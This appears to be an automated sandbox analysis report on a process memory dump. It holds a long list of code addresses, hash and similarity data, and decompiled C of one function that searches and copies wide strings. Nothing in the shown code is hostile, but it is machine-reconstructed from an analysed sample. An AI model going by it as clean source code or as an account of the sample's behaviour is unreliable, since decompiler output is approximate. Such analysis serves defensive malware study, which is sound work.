0x008ab059
0x008ab05f
0x008ab068
0x008ab068
0x008ab06d
0x008ab072
0x008ab074
0x008ab07c
0x008ab07e
0x008ab084
0x008ab088
0x008ab0c7
0x008ab08a
0x008ab08c
0x008ab08e
0x008ab091
0x008ab096
0x008ab098
0x008ab09a
0x008ab09a
0x008ab09b
0x008ab0a0
0x008ab0a7
0x00000000
0x00000000
0x008ab0a9
0x008ab0ad
0x008ab0b3
0x00000000
0x00000000
0x00000000
0x008ab0b3
0x008ab09a
0x008ab096
0x008ab0b5
0x008ab0b5
0x008ab0b7
0x008ab0b8
0x008ab0bd
0x008ab0bd
0x00000000
0x008ab061
0x008ab061
0x008ab066
0x008ab0cf
0x008ab0d5
0x008ab0da
0x008ab0dc
0x008ab66c
0x008ab671
0x008ab676
0x008ab678
0x008ab680
0x008ab682
0x008ab688
0x008ab68a
0x008ab68c
0x008ab6cb
0x008ab68e
0x008ab68e
0x008ab690
0x008ab692
0x008ab695
0x008ab698
0x008ab69a
0x008ab69c
0x008ab69c
0x008ab69e
0x008ab69e
0x008ab69f
0x008ab6a4
0x008ab6a9
0x008ab6ab
0x00000000
0x00000000
0x008ab6ad
0x008ab6b1
0x008ab6b5
0x008ab6b7
0x00000000
0x00000000
0x00000000
0x008ab6b7
0x008ab69e
0x008ab69a
0x008ab6b9
0x008ab6b9
0x008ab6bb
0x008ab6bc
0x008ab6c1
0x008ab6c1
0x00000000
0x008ab0e2
0x008ab0e6
0x008ab0e9
0x008ab0ec
0x008ab0ef
0x008ab0f3
0x008ab0f6
0x008ab0f9
0x008ab10a
0x008ab10e
0x008ab112
0x008ab116
0x008ab116
0x008ab118
0x008ab11c
0x008ab11c
0x008ab11e
0x008ab120
0x008ab120
0x008ab123
0x00000000
0x00000000
0x008ab12d
0x008ab12f
0x00000000
0x008ab135
0x008ab135
0x008ab139
0x008ab13b
0x008ab13e
0x008ab13e
0x008ab144
0x008ab147
0x008ab14d
0x008ab150
0x008ab154
0x008ab15b
0x008ab15e
0x008ab161
0x00000000
0x00000000
0x008ab16b
0x008ab16d
0x00000000
0x008ab16f
0x008ab16f
0x008ab16f
0x008ab172
0x008ab172
0x00000000
0x008ab16d
0x008ab49c
0x008ab4a0
0x008ab4a4
0x008ab4a8
0x008ab4ba
0x008ab4ba
0x008ab4bc
0x008ab4be
0x00000000
0x00000000
0x008ab4c0
0x008ab4c0
0x008ab4c2
0x008ab4c4
0x008ab537
0x008ab537
0x008ab53b
0x008ab53f
0x008ab543
0x008ab545
0x00000000
0x00000000
0x008ab54b
0x008ab54c
0x008ab552
0x00000000
0x008ab554
0x008ab554
0x00000000
0x008ab554
0x00000000
0x008ab552
0x008ab64d
0x00000000
0x008ab4c6
0x008ab4c6
0x008ab4ca
0x008ab4cc
0x008ab4d0
0x008ab4d4
0x008ab4d8
0x008ab4da
0x00000000
0x00000000
0x008ab4e0
0x008ab4e1
0x008ab4e3
0x00000000
0x008ab4e5
0x008ab4e5
0x008ab4e9
0x00000000
0x008ab4e9
0x00000000
0x008ab4e3
0x008ab5c5
0x008ab5c9
0x008ab5cd
0x008ab5cd
0x008ab5cf
0x008ab558
0x008ab558
0x00000000
0x008ab5d1
0x008ab5d1
0x008ab55d
0x008ab55d
0x008ab561
0x008ab561
0x008ab563
0x008ab567
0x008ab56b
0x008ab56f
0x008ab56f
0x008ab57a
0x008ab57e
0x008ab584
0x008ab587
0x008ab58d
0x008ab593
0x008ab596
0x008ab599
0x00000000
0x00000000
0x008ab59d
0x008ab59f
0x008ab5ab
0x008ab5ab
0x008ab5af
0x008ab5af
0x008ab5b1
0x00000000
0x008ab5a1
0x008ab5a1
0x008ab5a2
0x008ab5a6
0x00000000
0x00000000
0x00000000
0x00000000
0x008ab5a6
0x00000000
0x008ab59f
0x008ab5e2
0x008ab5e6
0x008ab5ea
0x008ab5f0
0x008ab5f0
0x008ab5f3
0x00000000
0x008ab5f9
0x008ab5fd
0x008ab5ff
0x00000000
0x008ab605
0x008ab605
0x008ab609
0x008ab609
0x008ab60b
0x008ab60f
0x008ab613
0x008ab617
0x008ab617
0x008ab621
0x008ab624
0x008ab62a
0x008ab631
0x008ab634
0x008ab637
0x008ab63a
0x00000000
0x00000000
0x008ab644
0x008ab646
0x00000000
0x008ab648
0x00000000
0x008ab648
0x00000000
0x008ab646
0x008ab4ae
0x008ab4b2
0x008ab4b6
0x008ab4ba
0x008ab4bc
0x008ab4be
0x00000000
0x00000000
0x008ab4be
0x008ab5ff
0x008ab5d3
0x008ab5d3
0x008ab5d7
0x008ab5d9
0x008ab5dd
0x008ab5b4
0x008ab5b4
0x008ab5b6
0x00000000
0x00000000
0x00000000
0x00000000
0x008ab5b6
0x008ab5d1
0x008ab5cf
0x00000000
0x008ab4ed
0x008ab4f9
0x008ab4fd
0x008ab4fd
0x008ab503
0x008ab50b
0x008ab50b
0x008ab510
0x008ab514
0x008ab518
0x008ab51a
0x00000000
0x00000000
0x008ab520
0x008ab523
0x008ab525
0x00000000
0x008ab527
0x008ab527
0x008ab52b
0x008ab52f
0x008ab535
0x00000000
0x00000000
0x00000000
0x00000000
0x008ab535
0x00000000
0x008ab525
0x008ab658
0x008ab65d
0x008ab661
0x008ab663
0x00000000
0x008ab663
0x008ab4ba
0x008ab176
0x008ab176
0x008ab176
0x008ab178
0x008ab17a
0x008ab1e3
0x008ab1e5
0x008ab495
0x008ab1eb
0x008ab1ed
0x008ab1ed
0x008ab1f0
0x008ab20c
0x008ab218
0x008ab218
0x008ab21e
0x008ab21e
0x008ab223
0x008ab227
0x008ab22b
0x008ab22d
0x00000000
0x00000000
0x008ab233
0x008ab236
0x008ab238
0x00000000
0x008ab23a
0x008ab23a
0x008ab240
0x00000000
0x00000000
0x00000000
0x00000000
0x008ab240
0x00000000
0x008ab238
0x008ab489
0x008ab48e
0x008ab1f2
0x008ab1f2
0x008ab1f4
0x008ab1f6
0x008ab242
0x008ab242
0x008ab246
0x008ab248
0x00000000
0x00000000
0x008ab24a
0x008ab24b
0x008ab251
0x00000000
0x008ab253
0x008ab253
0x008ab253
0x008ab253
0x00000000
0x008ab251
0x008ab1f8
0x008ab1fd
0x008ab1fd
0x008ab1ff
0x008ab1ff
0x008ab203
0x008ab205
0x00000000
0x00000000
0x008ab207
0x008ab208
0x008ab20a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008ab20a
0x008ab1ff
0x008ab1f6
0x008ab1f0
0x008ab258
0x008ab25d
0x008ab25f
0x008ab261
0x008ab263
0x008ab269
0x008ab269
0x008ab265
0x008ab265
0x008ab267
0x00000000
0x00000000
0x008ab267
0x008ab26b
0x008ab26e
0x008ab273
0x008ab275
0x008ab278
0x008ab27a
0x008ab3d0
0x008ab3d0
0x008ab3da
0x008ab3dc
0x008ab3e2
0x008ab3e4
0x008ab3e6
0x008ab420
0x008ab422
0x008ab3e8
0x008ab3e8
0x008ab3ea
0x008ab3ec
0x008ab3ef
0x008ab3f2
0x008ab3f4
0x008ab3f6
0x008ab3f6
0x008ab3f8
0x008ab3f8
0x008ab3f9
0x008ab3fe
0x008ab403
0x008ab405
0x00000000
0x00000000
0x008ab407
0x008ab40b
0x008ab40f
0x008ab411
0x00000000
0x00000000
0x00000000
0x008ab411
0x008ab3f8
0x008ab3f4
0x008ab413
0x008ab413
0x008ab415
0x008ab416
0x008ab41b
0x008ab41b
0x00000000
0x008ab280
0x008ab280
0x008ab283
0x008ab285
0x00000000
0x008ab28b
0x008ab28b
0x008ab28d
0x008ab291
0x008ab291
0x008ab294
0x008ab2b1
0x008ab2bd
0x008ab2bd
0x008ab2c3
0x008ab2c3
0x008ab2c8
0x008ab2cc
0x008ab2d0
0x008ab2d2
0x00000000
0x00000000
0x008ab2d8
0x008ab2db
0x008ab2dd
0x00000000
0x008ab2df
0x008ab2df
0x008ab2e5
0x00000000
0x00000000
0x00000000
0x00000000
0x008ab2e5
0x00000000
0x008ab2dd
0x008ab47d
0x008ab482
0x008ab296
0x008ab296
0x008ab298
0x008ab29b
0x008ab2e7
0x008ab2e7
0x008ab2eb
0x008ab2ed
0x00000000
0x00000000
0x008ab2ef
0x008ab2f0
0x008ab2f6
0x00000000
0x008ab2f8
0x008ab2f8
0x008ab2f8
0x008ab2f8
0x00000000
0x008ab2f6
0x008ab29d
0x008ab2a2
0x008ab2a2
0x008ab2a4
0x008ab2a4
0x008ab2a8
0x008ab2aa
0x00000000
0x00000000
0x008ab2ac
0x008ab2ad
0x008ab2af
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008ab2af
0x008ab2a4
0x008ab29b
0x008ab294
0x008ab2fd
0x008ab302
0x008ab302
0x008ab305
0x008ab308
0x008ab30b
0x008ab30d
0x008ab320
0x008ab323
0x008ab323
0x008ab329
0x008ab331
0x008ab331
0x008ab331
0x008ab332
0x008ab33c
0x008ab346
0x008ab349
0x008ab34f
0x008ab351
0x008ab357
0x008ab359
0x008ab35b
0x008ab395
0x008ab397
0x008ab35d
0x008ab35d
0x008ab35f
0x008ab361
0x008ab364
0x008ab367
0x008ab369
0x008ab36b
0x008ab36b
0x008ab36d
0x008ab36d
0x008ab36e
0x008ab373
0x008ab378
0x008ab37a
0x00000000
0x00000000
0x008ab37c
0x008ab380
0x008ab384
0x008ab386
0x00000000
0x00000000
0x00000000
0x008ab386
0x008ab36d
0x008ab369
0x008ab388
0x008ab388
0x008ab38a
0x008ab38b
0x008ab390
0x008ab390
0x008ab39a
0x008ab3a0
0x008ab3a3
0x008ab30f
0x008ab30f
0x008ab30f
0x008ab3a5
0x008ab3a7
0x008ab3ad
0x008ab3b7
0x008ab3b7
0x008ab3ba
0x008ab3bb
0x008ab3be
0x008ab3c0
0x00000000
0x00000000
0x008ab3c2
0x008ab3c4
0x008ab477
0x00000000
0x00000000
0x00000000
0x00000000
0x008ab3ca
0x008ab3ca
0x008ab3cc
0x008ab3b1
0x008ab3b4
0x008ab3b4
0x00000000
0x008ab3b4
0x00000000
0x008ab3cc
0x008ab3b7
0x008ab3a7
0x008ab285
0x008ab17c
0x008ab17c
0x008ab181
0x008ab186
0x008ab188
0x008ab190
0x008ab192
0x008ab198
0x008ab19a
0x008ab19c
0x008ab1db
0x008ab19e
0x008ab19e
0x008ab1a0
0x008ab1a2
0x008ab1a5
0x008ab1a8
0x008ab1aa
0x008ab1ac
0x008ab1ac
0x008ab1ae
0x008ab1ae
0x008ab1af
0x008ab1b4
0x008ab1b9
0x008ab1bb
0x00000000
0x00000000
0x008ab1bd
0x008ab1c1
0x008ab1c5
0x008ab1c7
0x00000000
0x00000000
0x00000000
0x008ab1c7
0x008ab1ae
0x008ab1aa
0x008ab1c9
0x008ab1c9
0x008ab1cb
0x008ab1cc
0x008ab1d1
0x008ab1d1
0x008ab425
0x008ab425
0x008ab428
0x008ab42a
0x008ab42a
0x00000000
0x008ab17a
0x008ab5bc
0x008ab5bc
0x00000000
0x008ab5bc
0x00000000
0x00000000
0x00000000
0x008ab066
0x008ab431
0x008ab431
0x008ab433
0x008ab437
0x008ab441
0x008ab445
0x008ab455
0x00000000

Strings

@, xrefs: 008AAEF0

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8b23dda31ef708b485797a559140a73a4bae187a5af7111d082972d0fb887ed3
Instruction ID: fae704b81dc75758d74407e0314b606119836726ff6d692941490c03ea2edaa5
Opcode Fuzzy Hash: 8b23dda31ef708b485797a559140a73a4bae187a5af7111d082972d0fb887ed3
Instruction Fuzzy Hash: 15421A75A047128BEB248F29C49023A73E2FFDA710F18862DE895DBB96E774DC51C742

Uniqueness

Uniqueness Score: -1.00%

Function 008AB6F0, Relevance: 2.0, Strings: 1, Instructions: 704
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E008AB6F0(signed int __ecx, void* __eflags, signed int* _a4, signed int _a8) {
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed short* _t217;
				unsigned int _t225;
				signed int _t226;
				signed short** _t231;
				signed short* _t235;
				signed int* _t237;
				signed int _t242;
				signed int _t246;
				signed int _t254;
				signed int _t257;
				signed int _t259;
				signed int _t261;
				signed int _t262;
				intOrPtr* _t263;
				signed int _t266;
				signed int _t269;
				unsigned int _t275;
				signed int _t276;
				void* _t282;
				signed int _t285;
				signed int _t286;
				signed int _t290;
				signed int _t291;
				signed int _t293;
				signed int _t300;
				signed int _t301;
				signed int _t306;
				signed int _t307;
				signed int _t310;
				signed int _t319;
				signed int _t321;
				signed int _t335;
				signed int _t338;
				signed int _t339;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t355;
				void* _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				void* _t368;
				signed int _t369;
				signed int _t370;
				signed int _t373;
				intOrPtr* _t375;
				signed int _t376;
				signed int _t377;
				signed int _t378;
				intOrPtr* _t379;
				signed int _t380;
				signed int _t381;
				signed int _t383;
				unsigned int _t385;
				unsigned int _t386;
				unsigned int _t389;
				signed int _t390;
				signed int _t397;
				signed int _t400;
				signed int _t401;
				void* _t402;
				signed int _t403;
				signed int _t404;
				signed int _t407;
				signed int* _t408;
				signed int _t409;
				signed int _t413;
				signed int _t422;
				signed int _t424;
				signed short* _t425;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int _t438;
				signed int _t444;
				signed int _t446;
				signed int _t448;
				signed int _t451;
				signed int _t452;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				void* _t461;

				_v52 = 0;
				_t438 = __ecx;
				_v48 = 0;
				_push(0x80);
				_t422 = E008A1030();
				_t461 = (_t458 & 0xfffffff0) - 0x34 + 4;
				_t217 = _v52;
				if(_t217 == 0) {
					__eflags = 0;
					 *_t422 = 0;
					L8:
					_v48 = 0x40;
					_v52 = _t422;
					if((_a8 & 0x0000ffff) != 0) {
						__eflags = _t422;
						if(_t422 == 0) {
							_t338 = 0x40;
							_t300 = 0;
							L23:
							_t24 = _t300 + 2; // -2147483652
							_t368 = _t24;
							__eflags = _t368 - 0x40;
							_t369 =  <=  ? 0x40 : _t368;
							__eflags = _t338 - _t369;
							if(_t338 < _t369) {
								_t225 = (_t369 >> 5 >> 0x1a) + _t369 >> 6;
								_t370 = _t369 & 0x8000003f;
								__eflags = _t370;
								if(_t370 < 0) {
									_t370 = (_t370 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t370;
								}
								__eflags = _t370;
								_t226 = _t225 + (0 | _t370 > 0x00000000);
								_push(_t226 << 7);
								_t424 = _t226 << 6;
								_t373 = E008A1030();
								_t461 = _t461 + 4;
								_t339 = _v52;
								__eflags = _t339;
								if(_t339 == 0) {
									__eflags = 0;
									 *_t373 = 0;
									goto L36;
								} else {
									__eflags = _t373;
									if(_t373 == 0) {
										L34:
										_push(2);
										_push(_t339);
										_v68 = _t373;
										E008A10B0();
										_t373 = _v68;
										_t461 = _t461 + 8;
										L36:
										_v48 = _t424;
										_v52 = _t373;
										L37:
										 *((short*)(_t373 + _t300 * 2)) = _a8 & 0x0000ffff;
										__eflags = 0;
										_t231 =  &_v52;
										 *((short*)(_v52 + 2 + _t300 * 2)) = 0;
										L38:
										_t425 =  *_t231;
										if(_t425 == 0) {
											L40:
											_t375 = _a4;
											_push(0x80);
											 *_t375 = 0;
											 *((intOrPtr*)(_t375 + 4)) = 0;
											_t301 = E008A1030();
											_t461 = _t461 + 4;
											_t235 =  *_a4;
											if(_t235 == 0) {
												 *_t301 = 0;
												L61:
												_t237 = _a4;
												 *_t237 = _t301;
												_t237[1] = 0x40;
												L62:
												_push(2);
												_push(_v52);
												E008A10B0();
												_v52 = 0;
												_v48 = 0;
												return _a4;
											}
											if(_t301 == 0) {
												L46:
												_push(2);
												_push(_t235);
												E008A10B0();
												_t461 = _t461 + 8;
												goto L61;
											}
											_t376 =  *_t235 & 0x0000ffff;
											 *_t301 = _t376;
											if(_t376 == 0) {
												goto L46;
											}
											_t377 = 0;
											while(1) {
												_t377 = _t377 + 1;
												_t341 =  *(_t235 + _t377 * 4 - 2) & 0x0000ffff;
												 *(_t301 + _t377 * 4 - 2) = _t341;
												if(_t341 == 0) {
													goto L46;
												}
												_t342 =  *(_t235 + _t377 * 4) & 0x0000ffff;
												 *(_t301 + _t377 * 4) = _t342;
												if(_t342 != 0) {
													continue;
												}
												goto L46;
											}
											goto L46;
										}
										_t378 =  *_t425 & 0x0000ffff;
										if(_t378 != 0) {
											_t242 =  *_t438;
											__eflags = _t242;
											if(_t242 == 0) {
												L53:
												_t379 = _a4;
												_push(0x80);
												 *_t379 = 0;
												 *((intOrPtr*)(_t379 + 4)) = 0;
												_t301 = E008A1030();
												_t461 = _t461 + 4;
												_t246 =  *_a4;
												__eflags = _t246;
												if(_t246 == 0) {
													__eflags = 0;
													 *_t301 = 0;
													goto L61;
												}
												__eflags = _t301;
												if(_t301 == 0) {
													L59:
													_push(2);
													_push(_t246);
													E008A10B0();
													_t461 = _t461 + 8;
													goto L61;
												}
												_t380 =  *_t246 & 0x0000ffff;
												 *_t301 = _t380;
												__eflags = _t380;
												if(_t380 == 0) {
													goto L59;
												}
												_t381 = 0;
												__eflags = 0;
												while(1) {
													_t381 = _t381 + 1;
													_t343 =  *(_t246 + _t381 * 4 - 2) & 0x0000ffff;
													 *(_t301 + _t381 * 4 - 2) = _t343;
													__eflags = _t343;
													if(_t343 == 0) {
														goto L59;
													}
													_t344 =  *(_t246 + _t381 * 4) & 0x0000ffff;
													 *(_t301 + _t381 * 4) = _t344;
													__eflags = _t344;
													if(_t344 != 0) {
														continue;
													}
													goto L59;
												}
												goto L59;
											}
											__eflags =  *_t242 & 0x0000ffff;
											if(( *_t242 & 0x0000ffff) == 0) {
												goto L53;
											}
											_v36 = _t425;
											_t65 = _t378 - 0x41; // -65
											__eflags = _t65 - 0x19;
											_t66 = _t378 + 0x20; // 0x20
											_t382 =  <=  ? _t66 : _t378;
											_t347 = 0;
											__eflags = 0;
											_t383 = ( <=  ? _t66 : _t378) & 0x0000ffff;
											_v56 = _t383;
											while(1) {
												_t427 =  *(_t242 + _t347 * 2) & 0x0000ffff;
												_t70 = _t427 - 0x41; // 0x7fffffc0
												__eflags = _t70 - 0x19;
												_t71 = _t427 + 0x20; // 0x80000021
												_t428 =  <=  ? _t71 :  *(_t242 + _t347 * 2) & 0x0000ffff;
												__eflags = ( <=  ? _t71 :  *(_t242 + _t347 * 2) & 0x0000ffff) - _t383;
												if(( <=  ? _t71 :  *(_t242 + _t347 * 2) & 0x0000ffff) == _t383) {
													break;
												}
												_t347 = _t347 + 1;
												__eflags =  *(_t242 + _t347 * 2) & 0x0000ffff;
												if(( *(_t242 + _t347 * 2) & 0x0000ffff) != 0) {
													continue;
												}
												goto L53;
											}
											_t429 = _v36;
											_t348 = _t242 + _t347 * 2;
											__eflags = _t348;
											if(_t348 == 0) {
												goto L53;
											}
											_t306 = _t429 & 0x0000000f;
											asm("pxor xmm0, xmm0");
											_t385 = _t306 & 0x00000001;
											_t444 =  ~_t306 + 0x10 >> 1;
											_v32 = _t242;
											_v36 = _t429;
											while(1) {
												L69:
												_t430 = _t306;
												__eflags = _t306;
												if(_t306 == 0) {
													goto L75;
												}
												_t257 = 0;
												__eflags = _t385;
												if(_t385 != 0) {
													L79:
													_v40 = _t348;
													_t436 = _v36;
													while(1) {
														__eflags =  *(_t436 + _t257 * 2) & 0x0000ffff;
														if(( *(_t436 + _t257 * 2) & 0x0000ffff) == 0) {
															break;
														}
														_t257 = _t257 + 1;
														__eflags = _t257 - 0x7fffffff;
														if(_t257 < 0x7fffffff) {
															continue;
														}
														_v36 = _t436;
														_t350 = _v40;
														L83:
														_t257 = 0x7fffffff;
														L84:
														_v60 = _t257;
														_t431 = 0;
														__eflags = 0;
														_v68 = _t306;
														_v64 = _t444;
														_v44 = _t386;
														while(1) {
															_t307 =  *(_t350 + _t431 * 2) & 0x0000ffff;
															_t446 =  *(_v36 + _t431 * 2) & 0x0000ffff;
															__eflags = _t307 - 0x61 - 0x19;
															_t308 =  <=  ? _t307 - 0x20 : _t307;
															_t259 = ( <=  ? _t307 - 0x20 : _t307) & 0x0000ffff;
															__eflags = _t446 - 0x61 - 0x19;
															_t447 =  <=  ? _t446 - 0x20 : _t446;
															__eflags = _t259 - ( <=  ? _t446 - 0x20 : _t446);
															if(__eflags < 0 || __eflags > 0) {
																break;
															}
															__eflags = _t259;
															if(_t259 == 0) {
																L89:
																_t306 = _v68;
																_t444 = _v64;
																_t385 = _v44;
																_t262 = _v32;
																_t434 = _v36;
																L90:
																__eflags = _t350;
																if(_t350 == 0) {
																	goto L53;
																}
																__eflags = _t306;
																if(_t306 == 0) {
																	L97:
																	_t397 =  ~( ~_t306 + 0x00000007 & 0x00000007) + 0x7fffffff;
																	__eflags = _t397;
																	while(1) {
																		asm("movdqu xmm1, [edi+ebx*2]");
																		asm("pcmpeqw xmm1, xmm0");
																		asm("pmovmskb esi, xmm1");
																		__eflags = _t444;
																		if(_t444 != 0) {
																			break;
																		}
																		_t306 = _t306 + 8;
																		__eflags = _t306 - _t397;
																		if(_t306 < _t397) {
																			continue;
																		}
																		__eflags = _t397 - 0x7fffffff;
																		if(_t397 >= 0x7fffffff) {
																			L103:
																			_t397 = 0x7fffffff;
																			L104:
																			_t451 = _t262 & 0x0000000f;
																			__eflags = _t451;
																			if(_t451 == 0) {
																				L109:
																				_t319 =  ~( ~_t451 + 0x00000007 & 0x00000007) + 0x7fffffff;
																				__eflags = _t319;
																				while(1) {
																					asm("movdqu xmm1, [eax+esi*2]");
																					asm("pcmpeqw xmm1, xmm0");
																					asm("pmovmskb edi, xmm1");
																					__eflags = _t434;
																					if(_t434 != 0) {
																						break;
																					}
																					_t451 = _t451 + 8;
																					__eflags = _t451 - _t319;
																					if(_t451 < _t319) {
																						continue;
																					}
																					__eflags = _t319 - 0x7fffffff;
																					if(_t319 >= 0x7fffffff) {
																						L115:
																						_t319 = 0x7fffffff;
																						L116:
																						_t355 = (_t350 - _t262 >> 1) + _t397;
																						__eflags = _t355;
																						_t356 =  <=  ? 0 : _t355;
																						__eflags = _t319 - _t356;
																						_t357 =  <  ? _t319 : _t356;
																						_t321 = _t319 - _t357;
																						_t435 = _t262 + _t357 * 2;
																						_t263 = _a4;
																						 *_t263 = 0;
																						 *((intOrPtr*)(_t263 + 4)) = 0;
																						__eflags = _t435;
																						if(_t435 == 0) {
																							L151:
																							_push(0x80);
																							_t301 = E008A1030();
																							_t461 = _t461 + 4;
																							_t266 =  *_a4;
																							__eflags = _t266;
																							if(_t266 == 0) {
																								 *_t301 = 0;
																								goto L61;
																							}
																							__eflags = _t301;
																							if(_t301 == 0) {
																								L157:
																								_push(2);
																								_push(_t266);
																								E008A10B0();
																								_t461 = _t461 + 8;
																								goto L61;
																							}
																							_t400 =  *_t266 & 0x0000ffff;
																							 *_t301 = _t400;
																							__eflags = _t400;
																							if(_t400 == 0) {
																								goto L157;
																							}
																							_t401 = 0;
																							__eflags = 0;
																							while(1) {
																								_t401 = _t401 + 1;
																								_t358 =  *(_t266 + _t401 * 4 - 2) & 0x0000ffff;
																								 *(_t301 + _t401 * 4 - 2) = _t358;
																								__eflags = _t358;
																								if(_t358 == 0) {
																									goto L157;
																								}
																								_t359 =  *(_t266 + _t401 * 4) & 0x0000ffff;
																								 *(_t301 + _t401 * 4) = _t359;
																								__eflags = _t359;
																								if(_t359 != 0) {
																									continue;
																								}
																								goto L157;
																							}
																							goto L157;
																						}
																						_t269 =  *_t435 & 0x0000ffff;
																						__eflags = _t269;
																						if(_t269 == 0) {
																							goto L151;
																						}
																						__eflags = _t321;
																						if(_t321 != 0) {
																							L131:
																							_t160 = _t321 + 1; // 0x80000000
																							_t402 = _t160;
																							__eflags = _t402 - 0x40;
																							_t403 =  <=  ? 0x40 : _t402;
																							__eflags = _t403;
																							if(_t403 > 0) {
																								_t275 = (_t403 >> 5 >> 0x1a) + _t403 >> 6;
																								_t404 = _t403 & 0x8000003f;
																								__eflags = _t404;
																								if(_t404 < 0) {
																									_t404 = (_t404 - 0x00000001 | 0xffffffc0) + 1;
																									__eflags = _t404;
																								}
																								__eflags = _t404;
																								_t276 = _t275 + (0 | _t404 > 0x00000000);
																								_v68 = _t276 << 6;
																								_push(_t276 << 7);
																								_t452 = E008A1030();
																								_t461 = _t461 + 4;
																								_t407 =  *_a4;
																								__eflags = _t407;
																								if(_t407 == 0) {
																									__eflags = 0;
																									 *_t452 = 0;
																									goto L143;
																								} else {
																									__eflags = _t452;
																									if(_t452 == 0) {
																										L141:
																										_push(2);
																										_push(_t407);
																										E008A10B0();
																										_t461 = _t461 + 8;
																										L143:
																										_t408 = _a4;
																										_t408[1] = _v68;
																										 *_t408 = _t452;
																										L144:
																										__eflags = _t452;
																										if(_t452 == 0) {
																											goto L62;
																										}
																										_t282 = 0;
																										while(1) {
																											_t409 =  *_t435 & 0x0000ffff;
																											_t282 = _t282 + 1;
																											 *_t452 = _t409;
																											__eflags = _t321;
																											if(_t321 == 0) {
																												goto L149;
																											}
																											__eflags = _t282 - _t321;
																											if(_t282 == _t321) {
																												 *(_t452 + 2) = 0;
																												goto L62;
																											}
																											L149:
																											__eflags = _t409;
																											if(_t409 == 0) {
																												goto L62;
																											}
																											_t452 = _t452 + 2;
																											_t435 = _t435 + 2;
																											__eflags = _t435;
																										}
																									}
																									_t285 =  *_t407 & 0x0000ffff;
																									 *_t452 = _t285;
																									__eflags = _t285;
																									if(_t285 == 0) {
																										goto L141;
																									}
																									_t286 = 0;
																									__eflags = 0;
																									while(1) {
																										_t286 = _t286 + 1;
																										_t362 =  *(_t407 + _t286 * 4 - 2) & 0x0000ffff;
																										 *(_t452 + _t286 * 4 - 2) = _t362;
																										__eflags = _t362;
																										if(_t362 == 0) {
																											goto L141;
																										}
																										_t363 =  *(_t407 + _t286 * 4) & 0x0000ffff;
																										 *(_t452 + _t286 * 4) = _t363;
																										__eflags = _t363;
																										if(_t363 != 0) {
																											continue;
																										}
																										goto L141;
																									}
																									goto L141;
																								}
																							}
																							_t452 = 0;
																							goto L144;
																						}
																						_t413 = _t435 & 0x0000000f;
																						__eflags = _t413;
																						if(_t413 == 0) {
																							L124:
																							_t321 =  ~( ~_t413 + 0x00000007 & 0x00000007) + 0x7fffffff;
																							__eflags = _t321;
																							while(1) {
																								asm("movdqu xmm1, [edi+edx*2]");
																								asm("pcmpeqw xmm1, xmm0");
																								asm("pmovmskb eax, xmm1");
																								__eflags = _t269;
																								if(_t269 != 0) {
																									break;
																								}
																								_t413 = _t413 + 8;
																								__eflags = _t413 - _t321;
																								if(_t413 < _t321) {
																									continue;
																								}
																								__eflags = _t321 - 0x7fffffff;
																								if(_t321 >= 0x7fffffff) {
																									L130:
																									_t321 = 0x7fffffff;
																									goto L131;
																								} else {
																									goto L128;
																								}
																								while(1) {
																									L128:
																									__eflags =  *(_t435 + _t321 * 2) & 0x0000ffff;
																									if(( *(_t435 + _t321 * 2) & 0x0000ffff) == 0) {
																										goto L131;
																									}
																									_t321 = _t321 + 1;
																									__eflags = _t321 - 0x7fffffff;
																									if(_t321 < 0x7fffffff) {
																										continue;
																									}
																									goto L130;
																								}
																								goto L131;
																							}
																							asm("bsf ebx, eax");
																							_t321 = (_t321 >> 1) + _t413;
																							goto L131;
																						}
																						_t321 = 0;
																						__eflags = _t413 & 0x00000001;
																						if((_t413 & 0x00000001) != 0) {
																							goto L128;
																						}
																						_t413 =  ~_t413 + 0x10 >> 1;
																						__eflags = _t413;
																						while(1) {
																							_t269 =  *(_t435 + _t321 * 2) & 0x0000ffff;
																							__eflags = _t269;
																							if(_t269 == 0) {
																								goto L131;
																							}
																							_t321 = _t321 + 1;
																							__eflags = _t321 - _t413;
																							if(_t321 < _t413) {
																								continue;
																							}
																							goto L124;
																						}
																						goto L131;
																					} else {
																						goto L113;
																					}
																					while(1) {
																						L113:
																						__eflags =  *(_t262 + _t319 * 2) & 0x0000ffff;
																						if(( *(_t262 + _t319 * 2) & 0x0000ffff) == 0) {
																							goto L116;
																						}
																						_t319 = _t319 + 1;
																						__eflags = _t319 - 0x7fffffff;
																						if(_t319 < 0x7fffffff) {
																							continue;
																						}
																						goto L115;
																					}
																					goto L116;
																				}
																				asm("bsf ebx, edi");
																				_t319 = (_t319 >> 1) + _t451;
																				goto L116;
																			}
																			_t319 = 0;
																			__eflags = _t451 & 0x00000001;
																			if((_t451 & 0x00000001) != 0) {
																				goto L113;
																			}
																			_t451 =  ~_t451 + 0x10 >> 1;
																			__eflags = _t451;
																			while(1) {
																				_t434 =  *(_t262 + _t319 * 2) & 0x0000ffff;
																				__eflags = _t434;
																				if(_t434 == 0) {
																					goto L116;
																				}
																				_t319 = _t319 + 1;
																				__eflags = _t319 - _t451;
																				if(_t319 < _t451) {
																					continue;
																				}
																				goto L109;
																			}
																			goto L116;
																		} else {
																			goto L101;
																		}
																		while(1) {
																			L101:
																			__eflags =  *(_t434 + _t397 * 2) & 0x0000ffff;
																			if(( *(_t434 + _t397 * 2) & 0x0000ffff) == 0) {
																				goto L104;
																			}
																			_t397 = _t397 + 1;
																			__eflags = _t397 - 0x7fffffff;
																			if(_t397 < 0x7fffffff) {
																				continue;
																			}
																			goto L103;
																		}
																		goto L104;
																	}
																	asm("bsf edx, esi");
